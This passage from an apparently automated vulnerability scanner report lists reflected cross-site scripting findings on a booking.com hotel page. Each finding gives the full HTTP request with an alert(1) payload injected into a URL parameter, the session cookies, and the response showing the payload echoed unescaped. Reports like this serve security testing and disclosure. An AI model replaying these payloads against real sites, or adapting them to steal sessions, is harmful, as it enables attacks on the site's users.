Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:22 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55934
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotel/us259d8"><script>alert(1)</script>99180b375ff/copley-square.html" />
...[SNIP]...

4.197. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 109f6'%3balert(1)//510718ca3c6 was submitted in the REST URL parameter 2. This input was echoed as 109f6';alert(1)//510718ca3c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us109f6'%3balert(1)//510718ca3c6/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:31 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55859
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ing.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us109f6';alert(1)//510718ca3c6/copley-square.en.html';
booking.env.b_canonical_url_delimiter = '?';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking
...[SNIP]...

4.198. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c246"><script>alert(1)</script>ca9d29b05b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/copley-square.en-us.html6c246"><script>alert(1)</script>ca9d29b05b0?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:44 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTIralIgQDPa%2BU2m2TeiMmkqTwxqv8P9CSbaojOGwPyNNdTCsA2pp1CcZ4153Rkg0qsCH36ioWVwdYtCjINHYRQt5ogbRNxPN4%2Fhx8v8X2akzUe5hAd7etTtpEabE%2BOdLWGqw%2BeJDN%2Bl6eWiaXEkxoedKYKeOXlbvqavSUnO5t8yevR4bo5Wkj8Er53ucTZERs%2B8z52E30AqWphJuy3NAPVl0IohKm5JiPkR1%2Br8uKmVIqYJZ0tNXtXcoXES%2BWOcXaGwkkaXUBRPtj9xwyredU4%2BcXRi%2Bky3NQxeufDo%2F5CX76LXBwWievIqoeZEQrxXbW7u61LD4alt%2FHDjRsWRaLh%2BdowEJMAWvf6sd%2BU%2FT5R8yMFpoW7py1xmbla8lecSx6VaZFX337UfYQDkTXn%2FvsJTwFxUfIv87QWMZyhYwFeapP%2BhbGfkMV2E%2BpM22QgZAGqlsdK3Mv%2BKgjvGMzXafGcp6auwgAtkNlIa1jqYcLskbGpcUPY%2FgUUl7zZckZ8dN4fKNXKu7oOdAI24WAW0rBpeNAdSKvO1yOhk2KDk%2BTQf9Qew4fJDkP8%2F3WibH3152y9TVcjHPzwkYgMhYxEeekigFVTxmEWsj733jZMbynhZsgtylWAG31HfNBP%2FyNi0efglr3PL%2FPjWdjIfnVGP5I3RQDB%2BeUDrOE4V840viVuEx%2Fjy0LaUQHyeyEtQK0%2FubBm%2FpoX2QeySOEi1trx6co4HH1%2BMFfIgm2mEK8FNkMLdTL22jwcevVv3uCAHqpErSxzS85yh1gQoeesgtdMgnIvbJuEovBo8G4nPwDuZSBn7N59ghoPIp2irrie%2FBWiq%2FhZlzDx7wB4LBZXmo4iROpAO6n7ZfgJZHMhCUNOv%2FM7Y6qV8V3zMchCwALYMKcIFUvKhCKcOY5HgAdCvGu1mIXacXG6P%2F0arsYx0cDLSGzgFByjlcHlXyZWuPN3x780%2Bb7Iu4OMwqm4UfT34n6UFGkGFIraa5tDr4evTnOEbwH0eZS0J13juQwv0jlllU7KU9D3xwbGX7Sh6ToG2l0fVYF17yYigVmx4Gx0iUWgSu2XTJE6Cs54czFyQFe7qPhQO527Sw6U25ygU9hw1L3ZBVvsyRJAcYEDa57Uz0n7pO8tKpH4xQG0YqR6t1eCPqLQ2T2rW2Zd7PA4PDZDQFjrSVtLmOuUDRvefhzgGC9WeZ8eXU%2Bgpu37CVo5ehcrT90p8sfmDzhqaaIQx7KWvZMLN6uz8oZ8GDy2l7BRoVf59q8GYmlm1VOxFkxxLzhO2LpQQ6O%2B%2BwHodeWNk3YqgqJfC2CZXUg22U3ZXb1YIABwgIng%2FIwOLFp6p4504pihm7pZ%2BB7iervYO7NsrXHSlksImDv2r5RnNZydgRT6uvySwOY6W4Q1xCU9byndX1dhAGfLzjw9omvFAAVrR5HJ3pAEhzpTfd3PHQ8UyFGeQtWB%2Bri6XUUr%2Bgu73g4OtcD9oslYkbg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:19:44 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55934
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotel/us/copley-square.html6c246"><script>alert(1)</script>ca9d29b05b0" />
...[SNIP]...

4.199. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edee7'%3balert(1)//ed927a03f37 was submitted in the REST URL parameter 3. This input was echoed as edee7';alert(1)//ed927a03f37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/copley-square.en-us.htmledee7'%3balert(1)//ed927a03f37?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:55 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YVuoakmCuggKVBk4dVUHfDVnewdIvAmgoL0tSDTgFt9zgdISpAL9zaHjp6X9Iy1Q%2BUur%2B%2FRf37bFsaJsXw908W4diQTtTz13fHFhiEf%2FmLPYV%2FFGUzga5TwTyRd7Zqi5YdeROYvwI09F7R%2BHenmuEuJcMR%2FnFxXN%2FRAMEqLwczMSu34en%2FtI3AeEAtwK%2BBHe7jzOabclaj5UiseUxH3%2B6POt6jcGBLpsrYHQBSrxdHkAIY9CjOLB%2FbW6pDR0cPFb1Za3Vt022IKEwCF6AZ3n4zWvOKJs8BVmyo1ck5vPnPE4j9INed765odKzPMz5u1oFAl%2FpGd7isYZrIQNeSQ2u6CQhaSh%2FiKhyqvUBcnbv77xDHmzZPM6uA%2FULLH82QUtuW1MA8%2Fe8Lxz%2BzC8Jpn9eWSNdd3YOQOExP4JHg0ZTwPq5ygvygKvnyNngGlJmX8AvpISLdaJLPBuHKAFM4mLCx164EFuXFeLXLFI4Y8%2BFz7sDavEPeX2A6G0LKkMybTIU6VqU4Eb6QV5efi1fQI1pV4w8Ud3z%2FdyDcTZDOfCzXjnPvD%2BPekw0LLvFmUN88qQloqwt6aSzpTNcLwH8q93J9En2%2FAEWmlhiancoHjmEr9gFyYfgt7%2BKjTYAfeKfU4A%2BcXIq%2BxeayxrIPKurH6O8EIwdXr0YvAMdjjDEjRoj4RJ7Du%2FFwI0p%2BWoDDrz4mn2JbCfObAyCb%2BVVYak5pJqw2Hp68M6fEOKCVGT9E5Cz6DeT2rVyT5EfIogClFHau8pHoDDRK%2F%2FrLF6zfhuDNvHiI79UN%2F44ZPwOnf9cEAHHdvHV%2Fw0Ln60jq9qAgvHMs5y6xII9yg%2F2BJbGt%2Fhk8DoeNjse3WJBOaQZj5RKKkUKHuoVzkt4nlNSmfx1Ou6cBVu%2F5nFtOzq4tP00BN7RqJroHiWfEKOiGs6%2FtaY0Zzb4s%2FCkDEAgE7qKzrKgoSGbIvFaVpAMEIdhGykdL3%2FkDxY72ImGZMBah6rrVULGs1xMu4r8g4xIO8pj8jZEXSV9X7oNjp7suwCiXC9OJ8r%2F6FmpBUv1Y8UZed532VAHmJpftG7%2BOhdWga1yZ4ijRqTR5aElZcBSypuG9zAa8oMQbRjXwOmUeeTBdTnhG60Z9lonsMaUndyuEzdcPBIcg7L3CRJYHEGnimHMBo4tQ547yBF7ZFVQuRc%2BVX%2FMVXQHctSxtG9%2FJUsjbzh9xN5weHI6gPa6T13sqq0aw0HuZXq9qoYyMbO3Fu2zI7zO0KiI6ZTwxV7zMxrLAJF%2FBvbMpdE5GZX0%2FyGMJ%2Bda1vpZQcr%2B7quzwRCI7P2H8aizFq58Tyt1RVcBpICgb%2BEjofvbSJXtEpHU8HSXhsY0WVTABZRKoJEy4KRouDEtQZXf6UPOt7WHg7tne1cP%2Bb8P8o7lfL0%2Fx2IEoRcbbqkODR4IoI90AaA1L6rC18IITzW0a4OZIwWb6WZM0xEHEtjtRqTeRrfKG2KQw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:19:55 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55859
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ent_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/copley-square.en.htmledee7';alert(1)//ed927a03f37';
booking.env.b_canonical_url_delimiter = '?';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.env.close_button = "C
...[SNIP]...

4.200. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74577</script><script>alert(1)</script>db952ffff6a was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X174577</script><script>alert(1)</script>db952ffff6a HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoM